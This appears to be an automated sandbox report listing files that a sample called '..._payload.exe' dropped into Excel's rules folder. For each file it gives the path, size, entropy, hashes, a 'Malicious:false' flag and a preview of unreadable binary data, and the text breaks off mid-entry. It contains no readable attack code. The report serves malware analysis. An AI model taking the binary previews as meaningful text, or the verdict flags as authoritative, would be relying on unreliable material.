                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10952v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8529
                                                                                                                          Entropy (8bit):7.980085441644446
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:+NhDj8AT0wsdhSS3T5MDr2KuI6WVCORga3NWo46cXIT92D2Hi0h9qFQ:+bCwvUU7FNRZcYTw6EFQ
                                                                                                                          MD5:406F72113AA961DB714C23E75C8FCCBC
                                                                                                                          SHA1:817E8E4E824192CA5C2EEFFF0A40C1FB943C5974
                                                                                                                          SHA-256:F04E83C08443407E9BFDEF14E0ECD0FD352A32294FBBB9206B38F09A467C578C
                                                                                                                          SHA-512:E4A551533BBFE356A96ED46EFFDB4CE66014536121F2673C2FC8DA815F4C481CAB01ED3524435B9BCD8560CF72C03A76D7B0E2A94414F81CB51492F7F7F1884D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.8jR:...3......4;Z.a5J......J....<.........w&.<.R.h.D.IR..;.u.&.".#..f.^mm.[....Q.$.r.l./...=9..G..R..D!..x.....}...H.4.W.X...).5.j_2./..b.s.3..=C..!.N..|.J-B^A..dd..%..._...H...U.g9..F%........s..mB......]K....C..20..u..<..(...........(O.^..[...<.$agY}8...<.E.6.9.Bb...R.S.cz..y...&@.3#sK.}t...@{9..ZQ+'.o.Wf.i..Ao.P.'...y.J;...D..b.k...8.9t=.i/n.(.......(..E+.h.\.UwH.F.....J..w....@..{....F}a..0E...*D.,7gsv....._zU..q...>....n...p.[..l....{...[.)...z9^U..=S.4......D......N..1.....$C...&..D_.4.M...6...4..%..q7X..'.fX&.+k.78.r...3XMa.$8....R.l)....V"..jf.a...'GCreMx...H0t.y}..tW..$..iL..P_s..U........X^..^K........y..t.B0^u7o....<.C.c..Y..7.+j..G...J*...*`...{.%.y.d'..m..O..v._ZBC..D..%'>(..z.T..~.........a`.....y.(/.>..y..oc.....-.V........\.....X~.m.x.]z...._....y/..Q..n.Z..=....=.ZR..>.-...{.5.jK...7p...nU...Y....RW*..~.....e@........Ry`....~./..S.. K...."5c..bL........M.O.wR..ktF.....vf....0K.....<Ca-a.k.. ...6.-s-....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule10955v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1242
                                                                                                                          Entropy (8bit):7.8426416004863775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:gWaIgtB0Cz5SzBPftCHnSh0bGccDHwer106C/wB/+YxlHVwbD:gWaZtB0gIynShdQS1DC/wB/+AHVqD
                                                                                                                          MD5:46BC1559EEE9864D5B162447807B213A
                                                                                                                          SHA1:7F832A2433A28330FBDE23670B7BDFD7BD1E785C
                                                                                                                          SHA-256:23B8FD9AC5A0FF909F2765B4641A73CE236F1B43C15DE439016A0A2E47FA7CE2
                                                                                                                          SHA-512:408F95781A024F2FA9A519558C188039058A164FC88BBAB956824572BB43308BA63FDD5F7AC47B95E23868F128CD7266B3E1A521A4ECE24B177687A17806A84E
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlG.x..9.....>...e.....4.5....-K..%.!.v..p=...g5.Q_..0.t....u~.e......`.3......m.....C%.a..:q^.M...d....~f...03..}.|4.*.P..!tI.qj.....r.+.)...zco!.Z....ev.=.f..I$6..+.RQ.....kH_../.....b.4d....!D$....cD.P\.....P..9.R.."..S..]..v..g..s....j....O~>+..$[H..&.n.8.j.....^2...v/....-...D..m1.....^.eO(...O@.....k.-T...$........F...#]...i0..."mP.............I.ge..P....bI.o.\g...C28a8...)..S...<..N...9....'.t..^9.(....v...*............./.......t.u....A...{....3...|m...j.l4Q.....d.)....(.[......c..g..b'Xw..')..by..O.....\d. #...<.X|~;.........(d..\[....}}......n.D....#..wP.Ac2a.o...........~.wN.hS....R.|..00..n..-.?2.....9..\.r?I.d.[k..{...y...}.k6^~.;....6.8......jV.mD.s"..Odv...SZ......OX.....K-..D..D......rtd....O...D./....... K..jXijj..CU.....7...W.1.x..o..A..f.<0......... ...K............|j..#I..M?.....d.qpc.....86!#,..4......j.....3>=F.XH.5....Px6..B.@@=S.D....q...\6.h..7.bEy..2..v.;.....7.0V.........R./Q.>.B.4.....BS.].......g.v.".)

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11150v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1185
                                                                                                                          Entropy (8bit):7.815674947540608
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:EcgFIk+e0opbq6YpvB12rvE50884/Z4IwereRjbD:9Lk+0pLYpvBwDE5b5Z4F8eR3D
                                                                                                                          MD5:18402F45CCC876CAA6613A6EFC237FD5
                                                                                                                          SHA1:B880E329519EFB94E95F7F1EB17F95F22FAC8C13
                                                                                                                          SHA-256:D69B706A1F8BCDF39DBDA402AD798865877E2781F8A922F4C1C716816AF84DB0
                                                                                                                          SHA-512:BD3E7C64D7246B5B7DD21CA9965474071ECD4B9BB140FC2D1BC390A163E1447D88D8AF9F0F40C8CDBC7CF26CF4C56809AFA95794E5DF425AAA10749A1F1D96F4
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..Q...J.[.'.q..*3.......^D.....j.m.U.m..{.7..W`t.6..?.s*.i.K...Dl...d@...3.....F._....x>8..I...ml.VSV.I4........K.C.8.OO/.if.o.;.u..=..[..#..B}.._.....#...7.\uOu...........k1...2.~...-o.;ZC.C.p..U....+.U....$...qb!r.....D....Er...i...qG.{.G.b.4.......d&...V.L.o..v.bP/e..P.,.j.5{.M4g..yUS..c&....1ttQ..1.....*.../.-......8c.9..*"#g...$w...Mw......U.l....$Q..A-..X...~X.Qw.....;.....F...s.o8"..............E._b.X...jdas...Ni....k.......#uS..I.1Y=....B,..z.W.d....q.](.o.4.W.pz.n.. v....`M~Fv..[.}..D.1..r....kZ0P..+m@.......s...xF.Y..q....~c.F,......^..n....~.......$..I.>$^......nf..S.. .!./G.....<..cz..y0v2...Y.g.k..].u..w.U|./m.m-.]p?K.|.%#..p...(.E..gk...Y .U*..w.05...<n.8y.cg..@........L..#B.L...@.....F.~..Be..`D^z......ZL..|.....5It.l..T3.V_.dm.C..|.;1.`..?.K.8*y....._-...y..../0.0...EQEtO\.?.H.....'......E....}.dF.S..,..S......}...;P..fG..c..3S....=/-R/h5.....m..@f.;...V/....P,...P...t.....I.w.U.S`@h&....Z...x......f..(..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11154v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1073
                                                                                                                          Entropy (8bit):7.783874561692981
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:vkV1pA4EGhA1tGjSkQJBD5PT22uOS4pY+pKabD:vuuSGkAB9T22LpYsD
                                                                                                                          MD5:93198825E764DD70EDDA7623F3D2F1C9
                                                                                                                          SHA1:BE3290F8130F3272F9A53C83DF0C571E6C251604
                                                                                                                          SHA-256:00567015133201588E03D4939275C9735EEB98FA519D94FD1B6F3A5110D95396
                                                                                                                          SHA-512:E32A2B1ED45E9B74540B9DF8DEF50A92888F4116C5FFF88C1EF2A97F8CC5ABAB234F7CCEF4872175AB63E329304D102697D0214B8B417C5079DB28949AC4E025
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..57...P..-.We..z..2..@dDt.d...AESz -*u.}3(-...l..']................g9.X.l.j.[P..6.!EB=...Wd.sr6.............48|.....;#.b...p..2...[}.gE...?K0>}Qu4t..N..R....Y=..Z....<^s..Cv].F.Q%s5...[d.MX...../.Yu...M.2...C.../=....O8..&"..X..wef.V...[.h..*M.1.p....f...,.H[-;.(7.K5..(........B../.....2...v...~K..2.....$ ....4Zc....T^.....&#:.<t.U..[.R|..H..k.^L.....<...P2..L......[.g..b>..D.......]d.....3.".x...2S........Q2T..|..,@V...>*.W..0.x\....g...Z|.:/n.zG.>..c.l3U.,.:..FP@a..H..b.9..T..`../..~.$lU...x....PY{....@hK.A@.h... d....V.$..:.r._t......w...Q...!.{..G..1.0b..d..`.a...!N.NW..6.m#h.+..Z..0<...i..I...(..B.5....]tC......!...T.~...a..{.).;.#....kz&G_../.8.R.w^.V....Rhqw...t..|.:J^./_8%..Y5a...8.....W.tv....a.6.7%.i...r..l.5.D1S..8NK\.Wr':....&.{.8.G.%.....6!8....o......U7.Q.Q.:..56Z....h..R!...g....U....~..!'...%"...V...+...X.[A.|>.7%[.fH...~.Z.~...t.....N..1&.Om...c.v.1...$34....&..R.A.{...".._.wS.(..\htf...#.....fR...c%....;...."...+..phJtd

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11187v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3232
                                                                                                                          Entropy (8bit):7.944861183114895
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:w9dpqUqsVel8Z/iyA5liKn9y2ky9wL1VZu2GYaWNqNkVeo1GV0dW416CD9FHjBfr:mdV1Vea/pA5sCo2dt2NN0Zo1y3KHh
                                                                                                                          MD5:7B474642035F56F3393027DF541CF4BA
                                                                                                                          SHA1:55AA57BB0DD420FEF3022814A0392BCC6CBCD776
                                                                                                                          SHA-256:C59C0ECAF672150F783FE8A995A10DA43319291B02118B025E4D8CE9BF6DAF30
                                                                                                                          SHA-512:212C9A70D34E9B740B9CBBD55CF64ECBF0C9121B6AA0DAC6A868988F330EF88292498037A16CB87C4E8F32796E4AB4EC96B64825DEE47F6181719BD2EF71034C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...!..T8.T.L.1..k`X.U...Rz..LQ._.}...._".}K-...Mc....I..J....|.F.._...Hp.pe...A..+..8......F.4..eb)..#.I."....~yV#m....Y...?.E..u....D..A...:...........1..J...7.[...j.C.i4......5G..i.........s4E.V...........Y.-..{......r..;.........z.....P.Bm..G.H<.I<..6...._..-.+.9.....z.`'..."-.....^e.9....6.......A.-.2.q...5K..K._.6F........l...e2b.2.4..X.'..1..k..... .~b.uK. .3.?.|T...7F..J<.hB...'..l.}.9..*.1.74%..yRis.J'g..\V.t......v;.H...@I%Z.b.T(.....l.........j.....".....V.... ..D9t.N.1.0+.....k.HW..*;..aI.A.o..:...E..0<%J..p.H.mO...!..m.3....Wyhnq9.7........w..V.t..J$hM....@....l....|P.j.0..k.`!..y`"\.U..\.1jcD7.r......L.}D. ..P4.NQ....c.jbZ.z^..c.siX..(h..a.X7.^h...j]..?......$..@..$:.X..OY.t.!..$&A$B.T.?.....C./.T.Eq.L.9.*.o..*.og..m.G......tN&+I.}..c.X1'U!W3...}\meb....@..>..e.w..#.....<PnR...@.%.q).V.N..u.......h........t.Hw.pH^R..h.=...T.E...l.......:../..)CU.......*x@Q.AxX......E.R........D......h{.y......'.b.....P...lUF..Ka?....n..V.z*..}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11190v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1231
                                                                                                                          Entropy (8bit):7.823251030039452
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Zh9YEMVjb6gMS1EL8IvfkNQrwm5W1uQ4Iuw1CO+srHt58QAobD:Zh6EM16gMkiPvfums1OIb1u+tSKD
                                                                                                                          MD5:3C4701FC2AC4E58341428466AE1B4CEB
                                                                                                                          SHA1:6A4D48E89B779BEB52E7B9EE86BD310AC7F67978
                                                                                                                          SHA-256:E911519F80B80EED0D0B219954B427164A4C92D70FC2F55B34E5AAC7FF706753
                                                                                                                          SHA-512:5DB9F72D64E774643CC94CC968CA8A3ECD9A3049AB40BEEA149385CC6D6C704B5D74B31E902249563B0A362FF787C252A401F5DCA93EB8575AA6E32117BF6949
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.i.N.B..b.)E.!A...S..}&.!..d).K{B>Y..u5.......>....H!....&.../.......M..i.....E_O...l...S.].].n]...P..(...W...!O.;..7....b..e...3..K...../ru.Pm.&..1a;......N0../"N...V;k.\...$....[@&.C....G.w|=.h.7........-.....;a"g.z4`..H6(....>.,..'.Zv.U.W.8.Is..6.q<.s...(...Z..{..G'y*m..L..V..E.X"..>.....H.w....JOM..#..)}..:g..[....? %Q...g5*7.......".G.\.C....Q.1..5..B..x..l...<L...;.N3`g..T...3..'hM..B.k.L|`p..B5.g...."7lt.:.?..M..O...|Qw..=a.....:.......mE.sa.#.!!...'.n..v..tU..Y..De...G..k\...\&JD.T:..+6._L.cB.{a>...p.o...a...c"./[.T.^>`..iM...3v;.../.1.....4.#.......T......7lc..R..fs!.Q..MW.}S.S...P..m,9.c..`.[i./*S8{n.V..{..b.a..F...bCC..UU.%Ue>..\.].&....wH.@...{e...).1.";..D.)."....;...Gg.tM...o..T.u.M.=....|f.)."`.)yfp.?I.Y.9.!...}..^R...g.A4_..E. #K.G..f=+.....$b.#6k".......NF..+.Q.......+.>..kO|.2.U.Mo/U/....^....skp....=.2_..J.^.."J..[.3..]..(O.pj.C....|..3..{..f`....o.|......=...:.....~..)..{...'[....uo......U.i.0..3<...fA....z.{.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11195v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7567
                                                                                                                          Entropy (8bit):7.978989044222941
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:dpuyzpYSwTni8gA3lMpKJe+CqXzvk/QyTat+P:yyzwi8gDpKJenqXQlP
                                                                                                                          MD5:451E3B933F88A9FB9DF83CFC073008BB
                                                                                                                          SHA1:9631F05804B2D98ABB6DAB416C3BF8F67043276B
                                                                                                                          SHA-256:15EAAD2FE45787DC0A1B28B1DD80D4622CC3598E0AD0136C74C78A241AD571CF
                                                                                                                          SHA-512:05B2522BA7C3E13E394E4D9C8FE527B955A521FC1FE649AE5C97EDE785E456B5F2C04DB44253A3DD4E8B0A9E310A71B1ECD136E4812BBB704C15ED9DBF9375D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml$........._._...T"...}..t{,q.a-.......;...d.m.."..@.E6....+.....,5..$....J..r...\.>K....XX]y.%|..~m-9..Ee..?.$N...p!! c.|.E..'oqA..A.L.$gU@C...yy....XxX..F~...B..1DVR..(._..p.q.b!.J.`o...S4.x.m..2^.(..S..A...QHzZ.EG1.^....SJ:{.U......v.a....w-L....N.r...E......o.....h8..U.m.eb.h...l%..!.\4..$.s[...z.....C.3..n..OCv..>.oA(r\#..X.GLu*;..O._.[.V...f.K...g.[Q.K..#FYs....Y..@..u"/..*..nJ.(H....z5.........NV.-...N.c-.D.$d..d.h.~>=....B.G....Ug......p.,........;..Sh......*..<..Os.d..}mC2iX.<....&wJ}..P&8O........=....].PX..k...v...h.....Uio.'.;.e......Q.)L.C.....#Z:z`7X........O..ry......fR.Im5%.bE,O..n.R.0.Z.fn-.N. .K.V.X.....hi..B.7..ub.Wf.kmrg?,..P...'/l..S...f.....3R.*..~FD?i..a.tc.*-...q^.I.....;1..+...`i...y........N6.`...Tme@^....A.,.{..6.D.Y..i/8.2.....&.V...:KB#.K.... .>).7{x$.Dt....{.....owv.qq6..Y...rwr..l...gC;.V.a..A.M.k.l...|3..6..L..`..l..=.,.......p.Q..a2h...."c.<T...'.....b.V.(......2u..^.t|....d=s..^..T..`..../..D.2@..Q....

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11208v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):816
                                                                                                                          Entropy (8bit):7.720331984956419
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:vzuB/7xp+X98ttd0p4rp0lCK/ItwRq4cVyT7iYML/8VhYJOWy9u99Lq5bTcii9a:vzuvhlrpQCKgPtypMLqhYJOW/3+bD
                                                                                                                          MD5:45579F504B7C984D073314F31D11ADD4
                                                                                                                          SHA1:D8FE5F398E9B45989B5E70C4A2FF37803732BC5A
                                                                                                                          SHA-256:30F62F5B8707330365181D80880141C588ACA57298CF699AC5F1A6B80F298772
                                                                                                                          SHA-512:31C8F7A9AE45DCB5D4D34DB9EC09E45D77CE41EAFE10B7E8D251EB172B57456D266B947855AE60D4FEF28D5C9566019D162C434A2C12973F02F55971801A15D3
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml?.....=.r..*3'....a....O.....h.wO...Kb..W7.{.~[(.....\..Z..Q..{.xp.t...Sy....<.E.`........Z......'e..Z2VQ.B...#.?P.Oj.;.;..6.O..B...wP...E.$H..6;...q.}e.LM1uP...t..._...Z...4...*.=.Z....B.w`Cs.C......[..j..7q..s..3..~`.[$.@...'C...6p.ENP...xW..W..z..,^6....'..E....D...$.....8.XM......!.3......~Y..d...o.R..g..>.p...STV4D.F.o..Dm..":..:.!$.Y..?.'..<z.....I[n<....;_3>@.IX.#_{.T...,..Q..R.*...}..f..\b.rU.\C.]I#i.(...#.=.......J.l..L..23....7.<..u..'..5.x..8..:.....B.._U.B..dV.&"ZH>.d.P...i.\XV/n......9..u....,.(e.c...2(j....m.........0@...\..^{I@B6. ;.c..*..Lq..R..Q.Ne....<..V'......-....*.5..).t....G..9....}.Op.}CT+...p...s.%....y.F...`..Y..X..^As8.[e,.$.L..~../w3.Ci..s...V..t2...V.d......,(..phJtdHo970vyx7vwlYG00OakDR75RuJz7NXDArt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11209v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2272
                                                                                                                          Entropy (8bit):7.908010985656154
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:asvzOzd+rnqx8ABb7FspOIIaq4cdTeFaqt3UP5+RvAmPodxID:1OzQrnS8ABbZtNZZuUP5QvuxU
                                                                                                                          MD5:148D3CE1B589EB4CBD2F9BD11B2BA2AF
                                                                                                                          SHA1:9A51744835AAE55D43842819564D401181E55726
                                                                                                                          SHA-256:7F8D68CA74E165BEAAB51A4C78BBE0F30FF5019D319166946A8ADCEBF52F4413
                                                                                                                          SHA-512:3C8655A170D026AB18C428E040D2AFB6D9602D2147DD03B8FB6BE3ECEBCF7FB9F5F1699DAF75F6D256A8025AE3162788222B29E27E641CA4B0A399D7DB130277
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.....[..]..i.....o.?.2.' i...q'..h\.G...8:|..O_@(.....p...LY>@.....e....6....5.e.Uh.....]M..?..._.9..+...-.....D.g*..8.N..#4.....%..<,.i.v..l...2v....G.sjc.C..G..e...N.[]..I.2....K.[4.......d.-dko...O.v.ng.".vZ.\)....HB..Y.SM...T]#q.AA.....v..u".IqG.'A...I.I}...C.'..tI.f. bTeH..._Wf.R.,...?=.........Z..%*..B..q..o."].FJ.e..i$.#./..........&.$F=..(......jeG.R.p.I`DQl...@..y._.......O.{...f.KW...wT.|.X...V:.......;....w.Q.[{+.4..2.F.s|..](b.#....EQ......+[.yR2...'..`..UO...)....J..]..Z!nYoZ5.[..e-..7....q.[.t.$.P.^)q.F..G..)..mk.]......."E..?......Vy/.b....2f.....m.q.,.n8.O...z@I.?2},.|2.$I.Mn..G.....g(..d....."..g..z..^.d.7.7+oyS.....f'.k....<?...........%.I.5..YC..2...C..X...2U.....4..kg......7..d...B...&..o.......8UE.?Y.+...98....!..^....m.pqg..y..w.d.+X|ny...X...>.K.G;.?../5g...u.....i.8.R).z..[...[...,.k..Y...d.-...k..z...\.W.3(I......KB|...4fD..!.k..........|.Q2....$...,oc_.8.J.5R(A.Ye.ks.=y..l?..~d. ...~..At.d-

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11210v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1311
                                                                                                                          Entropy (8bit):7.8358078400499585
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:hjmgF1/uaUg/abmVOvNFWJHBifQacxOo9QVPXOSFf5Gr6lhDfRaXbD:h7/uaObPLEifQToo9uPXrFhGr4DpkD
                                                                                                                          MD5:13FCB302929A4A518AA656A6E56DB450
                                                                                                                          SHA1:A395B3BD431DB4DAD0A239F254AFDAC47DABE06C
                                                                                                                          SHA-256:911E402D4F9448558FEDE42335A43AFC87DC3B8D7AD2C017AED4E02D173A8296
                                                                                                                          SHA-512:730393B2D9640B3B0EAE310AA39F24FE2645C6C541BFA6B6F8B5D76AE08E98A2F556A8F821273F382578F626F8CE24C2DA59D29FCC323D12840F3EAD1257A888
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.(...>....B...q.Mo.*..d.c....... ~1..._..gd./....Y.y.l......)Hl...J.z..........c...jB..T#...:Q..p%..!w..?.?.`?.B..'..~c...(.8..C.uF....sRu!.;.&.:Z.,.S..D....35._.ar..t./...-....[B.e..!.......?.gW....@j@.`W.C.r.Hi.cac..[:.....J.w)......h.+.......I.....M..E.?v^c.l3....r..:..#Iy.L...RtM.6b?..X.6......x.....q.k....{..Z....%....m8X6tB..#&...c.nH"...$G...'"t..P.....$.5...L...@.4..O..W.v.G.E4t............ED..U.z@..9.........!...t.v.g.E8..Xe...r......xF...f....5\. ..r.n....C.I.D.....*.qM%.,.u..\c......$.[..R5r.d.!.{....S.n..>"..B.t.f....%..u..Rj.R.HO.G.h..fe.5d...x.t.V....4...z.q^0+.Rq'......E.2........T...../...q.....6..}!. ..mz.a..;)....1z..ps..oOd..!..a0../. W...u.S......P.zi...`?.....B.....zO...CU....u.ebY.&34q2..=T...kb..C...dJ..._...x.. {.f^5h.cC..C.X.Un.P..p...H.|B....f..s...P...[._.}L..Iq..|(R.pRoQ...Ria..Fg.Qh X.....A7.6q....A...W.`...._..f....5...`.l...^.......c)......8. ."S*'.x.O.'Zw)..5*..}.5x... X.!..iLet..q.....#..b...

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11264v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3172
                                                                                                                          Entropy (8bit):7.927398823486377
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:z54+qEvWFj7fhdAil453wgKKVrCHrbokKmGeT8OZhN9VsT6zSMgRjALeqD:WLF8B5KKtNkKmGlC6T6ysJ
                                                                                                                          MD5:EFE709E74A17AFC7C56C39A1CD6A4409
                                                                                                                          SHA1:4A4FE07AA85678FA62FCE8D3EFCC5F3403BA1492
                                                                                                                          SHA-256:1230653A99FFA833A220BD33DEB6490CC1FB2516335D3593F20B8560ACD15B82
                                                                                                                          SHA-512:87CDC95BB48AE1347DE3DC6FC26EC94B3ABCAECD8FCF76CAE11DB59321CDB697D9E223C28C0F3EF03495BCA3E9491156EC8BBFB2BA7411CDDCE4B588524CC50F
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..V..kl...#.......W.....A.M%^..pYmD......#.O..]....*)...d*....~..J)..\......`....T.c ......Jp.(..Zf.QZ..of..m7.s$. ...vC..|e..Ru...7U...=...u..(....M.[9sf."...*.I...l....y.H.F..k6V.8.:.......W...6.C.4Y.[.z.I.....N.....u.p....?.M..>.._ '>.j..pK?.A.}....o.6....|7........4..]]R.mRH...g.%].%D..e...]...(...v.!.,..'.-.D#e......<m..'n.@.G.......~.L.1...Vy1.@C.x..<.G..8..?.`5f>Yb....Q.4.Kgwt\..N.:-b....+....x_v..)M.....9<.~...@...\..p.td..|..V.2,...,k.=.X..VM..N..E.w.p..jD2z.9...."1Z.....0...u.yYLk..` )...%...........y#%...du~.q.VZ.T.3...Y#.w.=...).t{V.....%.........4p.]*.{.7......e5kM,..Op0+k.d.N.C..u.`'..Q.H......n.,.HS..P.Tsn.dKxz..-o]..Y...&.S.....zf.u0.I.B6J........@O..g}..4%y..\L.....{..'....sf.lt..f.Ik?.G..%..4..O?P..#A.2r.>.B.....r:.u.H.?.2.0\{..,.L......jn..l>'(.bkQ.~Ev.....EF..........l.n...1!."f.[.......:..._...i#R.m6..1...g......Lq*.-^#4..)8v3o.......~...h.....GJ.nA##G}2..q..O..<.....a..0t...t&....OZ'....>KJX"..1...1.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11265v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2096
                                                                                                                          Entropy (8bit):7.887038620665771
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:DtLNdFaS0FmTUMRcegeQek38RytkVFXiTWsEM80M30di8Te8K/JBD:hh3TUM7FQwPiaM80F6pH
                                                                                                                          MD5:84602D7FD24BD063DA115A77FC777279
                                                                                                                          SHA1:925BA62212D69D2B13F1B04A2296D2F5B310F62F
                                                                                                                          SHA-256:40E64212375FD52ED6E0212F3D2F7658E9E2651544B30FC10E10E0C8CC2B362E
                                                                                                                          SHA-512:2AE65C8C817AFFAC773DD749720BC7AE20C8ADA219C7E9B80D1E4FA03B608F99AECDB96E6338D7683CF9FC51CB1CBBB2F9D73E3DC37421123F4D0C82D915157A
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml!.4......v.r.Z.....\...f.T.|..s..z ..c-{.E.....o!>.l..].F&_.u.....B./|...v....e.a\..H.P.E.......6...An.h..L....g.Ow*j..jG...Yn6:........l...M/...ML.kU\7b.....^..N.....vN|O...?....B....5..k*..w.-.@tU.$.......uJ8..|SKxE|..hZ....A.....Q.....aQ./6v$..S&z...t6..20C.,.G..0}. .g.....pJ..h.*Q....F.....3.(......?...YZ.b......;...q'?...v..;\..+.K.u.........y<'...Dt.Rv5E...}..`.3j"~D.....)..6t./i.K.v......._........g...~.S...9..*...3...E.]..Cy%..WVo...J.<...Q.ygg..@0,..M.vg....CY......Hq..'=..x.d<..X...h@.Eps.d.6...@.... X.c....._.............y2~8dl`1...4...9Y..s+....W>..T.$d.c..p...lt...&H..^..>..L....gF.2(T..a..1...c3..........P...7owi".8..5...'.i2...P(n10.u1.Mt..o. k.h.>...Tw.Xd...y.y.)h..k{.g.'ILM^.U..J.R6G....4C..........G....}...3<.#..B|;...%..8.....66..-....a.e\J......{i...YJ..n...w..we......].5..j......T..6ZA.T...I....Z..*S.d..u.....b$..f..1k5A...$m...M..kn.{K>...)..0......R..f,,.R...1.Q.1A...........+f....J.LJ.....g.?.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11285v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7525
                                                                                                                          Entropy (8bit):7.972880653260466
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:x+w5ggiORDOGhquwH3kUSxOtCQd/jaDTBwh7fveGfhKd/:x+wZRFhK3kU2OIo7f20K5
                                                                                                                          MD5:0F262CE56090CBF7708B238A9206FC60
                                                                                                                          SHA1:4681B5F292820B9A4BC321A8484CBCB3B648905C
